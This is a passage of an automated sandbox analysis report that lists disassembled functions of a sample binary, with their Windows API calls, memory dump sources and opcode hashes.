                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00311098,002D17CE,?,?,00000007,?,?,?,002D13D6,?,00000000), ref: 002F8EB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: 116bfe188b22fd04056115d32d0dc30be94d24460d0abb79a3799bcfa1fcb804
                                        • Instruction ID: a8d0aa271fd69c6e0cc8024f5c4df7797bf2ae354d0629235cb28a14a3445905
                                        • Opcode Fuzzy Hash: 116bfe188b22fd04056115d32d0dc30be94d24460d0abb79a3799bcfa1fcb804
                                        • Instruction Fuzzy Hash: 9AF04F3263511E66DB212E259C05F7FE75C8F91BE0F254136FB18A6191DFA0992089A0
                                        Function 002E109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 002E10AB
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 002E10B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 885e0a01068a11ef03d0fc4acad590a812cf936d12420982ad00c249c1424f20
                                        • Instruction ID: 6f677ac8b6a4a80ded463e95c6f1e12a3346494a3e585b784ebc3c7fadccf878
                                        • Opcode Fuzzy Hash: 885e0a01068a11ef03d0fc4acad590a812cf936d12420982ad00c249c1424f20
                                        • Instruction Fuzzy Hash: 12E0D832B61186E7CF098BB5DC159EB73DDEA443047104176E803D3101F930DE554660
                                        Function 002DA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 00154e8de9ee04e54a1c9e31d11ef18fb59b1d64e478bfd22a06be862f1f9545
                                        • Instruction ID: 8ee46596915e827f5f41b36bd4f148a39c741d1f5e5227dfb37a8940c0a351fb
                                        • Opcode Fuzzy Hash: 00154e8de9ee04e54a1c9e31d11ef18fb59b1d64e478bfd22a06be862f1f9545
                                        • Instruction Fuzzy Hash: 1AF0303225114ABBDF025F60DC45FDA376CAF04385F848052B945D5260DB71DEA8DA50
                                        Function 002DA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNELBASE(000000FF,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641,000000FF), ref: 002DA1F1
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641), ref: 002DA21F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DeleteFile$_wcslen
                                        • String ID:
                                        • API String ID: 2643169976-0
                                        • Opcode ID: 938fe4f22c14d9a645788333ddadb95d2ad05169362361d5cd7025815ca1cc0a
                                        • Instruction ID: 2518e6412df47979422152af5743b3bc478d8dff1c488f767e7fd879b74ac416
                                        • Opcode Fuzzy Hash: 938fe4f22c14d9a645788333ddadb95d2ad05169362361d5cd7025815ca1cc0a
                                        • Instruction Fuzzy Hash: 27E092311512097BDB025F61DC45FD9375CAB08385F488023BD45D2150EB61DEA4DA50
                                        Function 002EAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00302641,000000FF), ref: 002EACB0
                                        • CoUninitialize.COMBASE(?,?,?,?,00302641,000000FF), ref: 002EACB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: 8b477c17db9b540b51920ecda549877e885eab6074ca7bf725c31cc7d0026d4b
                                        • Instruction ID: a0775be476200714e59b906ac504b5a43c2daebb0c1676433c5573ebe0a0af04
                                        • Opcode Fuzzy Hash: 8b477c17db9b540b51920ecda549877e885eab6074ca7bf725c31cc7d0026d4b
                                        • Instruction Fuzzy Hash: 1EE06572544650EFCB019B59DC46B46FBACFB48B20F00426AF416D37A0CB746840CA94
                                        Function 002DA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,002DA23A,?,002D755C,?,?,?,?), ref: 002DA254
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,002DA23A,?,002D755C,?,?,?,?), ref: 002DA280
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 27997c026a97209aa9cce93ff957929fb7e5345ba7747c42d3362f0b6519a58e
                                        • Instruction ID: 6b74b58f3dcab08b5bbcbba15d591a93f0f995eccae50dc5a00c2465a97ef889
                                        • Opcode Fuzzy Hash: 27997c026a97209aa9cce93ff957929fb7e5345ba7747c42d3362f0b6519a58e
                                        • Instruction Fuzzy Hash: 6AE092715111249BDB21AB64CC09FD9775CAB083E1F044263FD45E3294D770DE54CAA0
                                        Function 002EDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 002EDEEC
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(00000065,?), ref: 002EDF03
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                        • String ID:
                                        • API String ID: 2718869927-0
                                        • Opcode ID: 0af66249e306ebd0111081b9b11c2c1dc3d006d96d9117b5433ed674880cb356
                                        • Instruction ID: 947e1b2e872faabd1d560e2eb4c93d58c39720a9045adbad8c4da734fd3bc3b5
                                        • Opcode Fuzzy Hash: 0af66249e306ebd0111081b9b11c2c1dc3d006d96d9117b5433ed674880cb356
                                        • Instruction Fuzzy Hash: D2E092B291028826DF03BB62DC06FDE3B6C5B19785F444852B200DA1A2DE78EA608A65
                                        Function 002E081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: 2a2299b012b1b0193278c7cc871c7ac2228b3befbb08a5ac285439b7ecb2d3b5
                                        • Instruction ID: 6d93ee8be50c597b2c57183d4a8b39e4aa85d58852a9879be77bd2554464aaec
                                        • Opcode Fuzzy Hash: 2a2299b012b1b0193278c7cc871c7ac2228b3befbb08a5ac285439b7ecb2d3b5
                                        • Instruction Fuzzy Hash: 4AE0D8724111586BCF01AB91DC08FDA77ACEF0C3C1F0400667605D2004D6B4DA84CFB0
                                        Function 002EA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002EA3DA
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002EA3E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: b79fd0f79e010a01ec5193e23c7fa8c6e1de55dcb307d7af1f64455e8495ca89
                                        • Instruction ID: 7a9e88cdf9f098b5041de3fc6409ee82cb8f1d0e18a649a9924b5ecc216dfbb1
                                        • Opcode Fuzzy Hash: b79fd0f79e010a01ec5193e23c7fa8c6e1de55dcb307d7af1f64455e8495ca89
                                        • Instruction Fuzzy Hash: E8E0ED71911258EBCB10DF56C541699BBE8EB04764F60C05AA89693241E3B4AE14DB91
                                        Function 002F2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002F2BAA
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 002F2BB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                        • String ID:
                                        • API String ID: 1660781231-0
                                        • Opcode ID: 79163206ad1961cc1968520e2b272857c24f109b048451202944b215464005a8
                                        • Instruction ID: 1a32dd91097a9348046b712cca61d3a8c0a39045045793b42d80f886c85c4f74
                                        • Opcode Fuzzy Hash: 79163206ad1961cc1968520e2b272857c24f109b048451202944b215464005a8
                                        • Instruction Fuzzy Hash: 1ED0A73517420D944C146E70A906679E345DD43BF9BA006B6EF20854C1DE10407C5811
                                        Function 002D12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 1fc5317c104fe1f649782f7c8d28bbb7aee4020f3aac19878aa40baf053009b2
                                        • Instruction ID: 328fb3cfaccd6f57c2c5ddf817a26a99334ccaba56a3d6c2901eb83083ff50c8
                                        • Opcode Fuzzy Hash: 1fc5317c104fe1f649782f7c8d28bbb7aee4020f3aac19878aa40baf053009b2
                                        • Instruction Fuzzy Hash: F5C0123289C200BECB022BB4DC09C2BBBACABA5312F04C908B4A5C0060C238C110DB11
                                        Function 002D1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 392eb961481e51da70936cdc8027e7e06335fba5b95f399162f2bd53e0785397
                                        • Instruction ID: 3e9926015ea1faf9f576c940ccc3ac18bf97d170ec0d742b1acbab845c56107f
                                        • Opcode Fuzzy Hash: 392eb961481e51da70936cdc8027e7e06335fba5b95f399162f2bd53e0785397
                                        • Instruction Fuzzy Hash: 00C1F470A20255BFEF15CF68C498BA97BA6AF05314F0801BBEC459B782CB309D74CB61
                                        Function 002D3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: e581ff8e3ff8f00a55ec1d1550f59bd9bde57185f944536c390ced17625afa1f
                                        • Instruction ID: c1e634bb96ace5a8e920c47c50af66b83e1f285d0e9dcdfb3abde254320a62f1
                                        • Opcode Fuzzy Hash: e581ff8e3ff8f00a55ec1d1550f59bd9bde57185f944536c390ced17625afa1f
                                        • Instruction Fuzzy Hash: 3D71E471560B859ECB25DF70C8559E7B7E9AF14301F40092FE1AB87381DA326EA8CF12
                                        Function 002D8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D8289
                                          • Part of subcall function 002D13DC: __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog$CloseFind
                                        • String ID:
                                        • API String ID: 2506663941-0
                                        • Opcode ID: 618fe76814b815854e00e7adde7c419662866dd6abe3682bbd99581df67ff671
                                        • Instruction ID: 499fe18b887625751567555339fd5ad7b15bf6835e7d44c2d066e6fbb4809354
                                        • Opcode Fuzzy Hash: 618fe76814b815854e00e7adde7c419662866dd6abe3682bbd99581df67ff671
                                        • Instruction Fuzzy Hash: F641B8719646599ADB24DB60CC55AEAB378AF04304F4404EBE18E67283EB705FD4CF10
                                        Function 002D13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002D5E37: __EH_prolog.LIBCMT ref: 002D5E3C
                                          • Part of subcall function 002DCE40: __EH_prolog.LIBCMT ref: 002DCE45
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 3435d932da6dcc2eee604f76121a799110af6479672f8081bd5521ed4734ad04
                                        • Instruction ID: 33dac9d4a6c1176e8a2837152300e8f62b7685a9f8ef3094fadd746bb1fad9a0
                                        • Opcode Fuzzy Hash: 3435d932da6dcc2eee604f76121a799110af6479672f8081bd5521ed4734ad04
                                        • Instruction Fuzzy Hash: 7F414CB0915B409EE724DF398885AE6FBE5BF19300F50492ED5FE83282CB716664CF10
                                        Function 002D13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002D5E37: __EH_prolog.LIBCMT ref: 002D5E3C
                                          • Part of subcall function 002DCE40: __EH_prolog.LIBCMT ref: 002DCE45
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 9bf2dbf5d9f969fb107e42fb288ba226a20f74cd85a3e43e4885faa78a7eafc9
                                        • Instruction ID: feeeb3f177aad26f29d84bcb6d08d56703eacb3a537260d7596bc829a7b23547
                                        • Opcode Fuzzy Hash: 9bf2dbf5d9f969fb107e42fb288ba226a20f74cd85a3e43e4885faa78a7eafc9
                                        • Instruction Fuzzy Hash: B6414CB0915B409EE724DF798885AE6FBE5BF19300F90492ED5FE83281CB716664CF10
                                        Function 002EB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EB098
                                          • Part of subcall function 002D13DC: __EH_prolog.LIBCMT ref: 002D13E1
